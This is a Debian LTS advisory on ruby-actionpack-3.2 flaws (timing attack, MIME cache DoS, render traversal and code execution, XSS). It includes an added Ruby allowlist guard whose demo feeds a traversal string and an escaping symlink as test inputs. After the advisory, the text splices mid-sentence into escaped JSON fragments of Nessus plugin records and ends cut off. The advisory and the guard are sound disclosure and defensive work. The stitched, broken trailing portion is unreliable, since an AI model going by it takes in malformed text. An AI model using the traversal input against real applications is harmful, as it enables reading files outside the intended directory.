Multiple vulnerabilities have been discovered in ruby-actionpack-3.2, a
web-flow and rendering framework and part of Rails:

* [CVE-2015-7576](https://security-tracker.debian.org/tracker/CVE-2015-7576)
A flaw was found in the way the Action Controller component compared
user names and passwords when performing HTTP basic
authentication. Time taken to compare strings could differ depending
on input, possibly allowing a remote attacker to determine valid user
names and passwords using a timing attack.
* [CVE-2016-0751](https://security-tracker.debian.org/tracker/CVE-2016-0751)
A flaw was found in the way the Action Pack component performed MIME
type lookups. Since queries were cached in a global cache of MIME
types, an attacker could use this flaw to grow the cache indefinitely,
potentially resulting in a denial of service.
* [CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752)
A directory traversal flaw was found in the way the Action View
component searched for templates for rendering. If an application
passed untrusted input to the render method, a remote,
unauthenticated attacker could use this flaw to render unexpected
files and, possibly, execute arbitrary code.
* [CVE-2016-2097](https://security-tracker.debian.org/tracker/CVE-2016-2097)
Crafted requests to Action View might result in rendering files from
arbitrary locations, including files beyond the application's view
directory. This vulnerability is the result of an incomplete fix of
[CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752).
This bug was found by Jyoti Singh and Tobias Kraze
from Makandra.
* [CVE-2016-2098](https://security-tracker.debian.org/tracker/CVE-2016-2098)
If a web application does not properly sanitize user inputs, an
attacker might control the arguments of the render method in a
controller or a view, resulting in the possibility of executing
arbitrary Ruby code. This bug was found by Tobias Kraze from
Makandra and joernchen of Phenoelit.
* [CVE-2016-6316](https://security-tracker.debian.org/tracker/CVE-2016-6316)
Andrew Carpenter of Critical Juncture discovered a cross-site
scripting vulnerability affecting Action View. Text declared as HTML
safe will not have quotes escaped when used as attribute values in
tag helpers.
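
The three render issues above (CVE-2016-0752, CVE-2016-2097, CVE-2016-2098) all depend on request data reaching the render method. The following is an added example, not part of the advisory or of Rails: an application-side guard in plain Ruby that maps request values to an allowlist and checks that the resolved file stays inside the view root. `SafeTemplate`, its allowlist, the directory layout and the sample inputs are hypothetical and constructed for illustration.

```ruby
require "pathname"
require "tmpdir"
require "fileutils"

# Added example: hypothetical guard, not Rails or Debian code.
module SafeTemplate
  class Rejected < StandardError; end

  # Request value => template path relative to the view root. Only these
  # keys can ever select a template; the request string is never a path.
  ALLOWED_TEMPLATES = {
    "summary" => "reports/summary.html.erb",
    "detail"  => "reports/detail.html.erb"
  }.freeze

  # Returns the absolute path of the template to render, or raises Rejected.
  def self.resolve(view_root, requested)
    # CVE-2016-2098 class: a parsed parameter can arrive as a Hash or Array,
    # which render would interpret as options. Accept plain strings only.
    raise Rejected, "template name must be a String" unless requested.is_a?(String)

    relative = ALLOWED_TEMPLATES[requested]
    raise Rejected, "template not in allowlist" if relative.nil?

    # Defence in depth for the CVE-2016-0752 / CVE-2016-2097 class: resolve
    # symlinks and confirm the file is still below the view root.
    root = Pathname.new(view_root).realpath
    begin
      candidate = root.join(relative).realpath
    rescue Errno::ENOENT
      raise Rejected, "template file missing"
    end
    inside = candidate.to_s.start_with?(root.to_s + File::SEPARATOR)
    raise Rejected, "template escapes view root" unless inside

    candidate.to_s
  end
end

# Builds a throwaway view tree and runs constructed inputs through the guard.
def demo_results
  Dir.mktmpdir do |tmp|
    root = File.join(tmp, "app", "views")
    FileUtils.mkdir_p(File.join(root, "reports"))
    File.write(File.join(root, "reports", "summary.html.erb"), "<p>ok</p>")

    # A file outside the view root, reachable only through a symlink that
    # sits at an allowlisted location.
    outside = File.join(tmp, "outside.txt")
    File.write(outside, "not a view")
    File.symlink(outside, File.join(root, "reports", "detail.html.erb"))

    inputs = {
      "allowlisted name"     => "summary",
      "traversal string"     => "../../outside.txt",
      "hash instead of name" => { "option" => "constructed" },
      "symlink leaving root" => "detail"
    }

    inputs.map do |label, value|
      outcome = begin
        SafeTemplate.resolve(root, value)
        "accepted"
      rescue SafeTemplate::Rejected => e
        e.message
      end
      [label, outcome]
    end.to_h
  end
end

puts demo_results.inspect if __FILE__ == $PROGRAM_NAME
```

Only the value returned by the guard is handed to the renderer; the raw request parameter never is.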

For Debian 7 Wheezy, these problems have been fixed in version
3.2.6-6+deb7u3.

We recommend that you upgrade your ruby-actionpack-3.2 packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: <https://wiki.debian.org/LTS>
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-actionpack-3_2-3.2.17-3.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-activerecord-3_2-3.2.17-3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-activesupport-3_2-3.2.17-2.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack-3_2 / rubygem-activerecord-3_2 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:34:25", "description": "Ruby on Rails blog :\n\nRails 4.2.5.2, 4.1.14.2, and 3.2.22.2 have been released! 
These contain the following important security fixes, and it is recommended that users upgrade as soon as possible.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-07T00:00:00", "type": "nessus", "title": "FreeBSD : rails -- multiple vulnerabilities (5a016dd0-8aa8-490e-a596-55f4cc17e4ef)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionpack", "p-cpe:/a:freebsd:freebsd:rubygem-actionpack4", "p-cpe:/a:freebsd:freebsd:rubygem-actionview", "p-cpe:/a:freebsd:freebsd:rubygem-rails", "p-cpe:/a:freebsd:freebsd:rubygem-rails4", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_5A016DD08AA8490EA59655F4CC17E4EF.NASL", "href": "https://www.tenable.com/plugins/nessus/89708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without 
modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89708);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n\n script_name(english:\"FreeBSD : rails -- multiple vulnerabilities (5a016dd0-8aa8-490e-a596-55f4cc17e4ef)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more 
security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby on Rails blog :\n\nRails 4.2.5.2, 4.1.14.2, and 3.2.22.2 have been released! These\ncontain the following important security fixes, and it is recommended\nthat users upgrade as soon as possible.\"\n );\n # https://groups.google.com/d/msg/rubyonrails-security/ddY6HgqB2z4/we0RasMZIAAJ\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2f53d93\"\n );\n # https://groups.google.com/d/msg/rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8279b0b5\"\n );\n # http://weblog.rubyonrails.org/2016/2/29/Rails-4-2-5-2-4-1-14-2-3-2-22-2-have-been-released/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e7354b9a\"\n );\n # https://vuxml.freebsd.org/freebsd/5a016dd0-8aa8-490e-a596-55f4cc17e4ef.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?337f01a2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack<3.2.22.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack4<4.2.5.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview<4.2.5.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails<3.2.22.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails4<4.2.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:34:28", "description": "This update for rubygem-actionpack-3_2 fixes the following issues :\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak Vulnerability in Action View. 
(boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution vulnerability in Action Pack (boo#968849)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-3_2 (openSUSE-2016-369)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rubygem-actionpack-3_2", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-369.NASL", "href": "https://www.tenable.com/plugins/nessus/90061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-369.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90061);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n\n script_name(english:\"openSUSE 
Security Update : rubygem-actionpack-3_2 (openSUSE-2016-369)\");\n script_summary(english:\"Check for the openSUSE-2016-369 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-actionpack-3_2 fixes the following issues :\n\n - CVE-2016-2097: rubygem-actionview: Possible Information\n Leak Vulnerability in Action View. (boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code\n execution vulnerability in Action Pack (boo#968849)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968850\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionpack-3_2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:rubygem-actionpack-3_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"rubygem-actionpack-3_2-3.2.17-3.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack-3_2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-01T14:21:18", "description": "Security fix for CVE-2015-7581 CVE-2015-7576 
CVE-2016-0751 CVE-2016-0752 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-actionpack-4.2.0-3.fc22 / rubygem-activemodel-4.2.0-2.fc22 (2016-94e71ee673)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:rubygem-activemodel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-94E71EE673.NASL", "href": "https://www.tenable.com/plugins/nessus/89583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-94e71ee673.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(89583);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2015-7581\", \"CVE-2016-0751\", \"CVE-2016-0753\");\n script_xref(name:\"FEDORA\", value:\"2016-94e71ee673\");\n\n script_name(english:\"Fedora 22 : rubygem-actionpack-4.2.0-3.fc22 / rubygem-activemodel-4.2.0-2.fc22 (2016-94e71ee673)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7581 CVE-2015-7576 CVE-2016-0751\nCVE-2016-0752 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178042.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?388986a3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1947bae3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected 
rubygem-actionpack and / or rubygem-activemodel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionpack-4.2.0-3.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-activemodel-4.2.0-2.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack / rubygem-activemodel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T16:31:34", "description": "Ruby on Rails blog :\n\nRails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been released! 
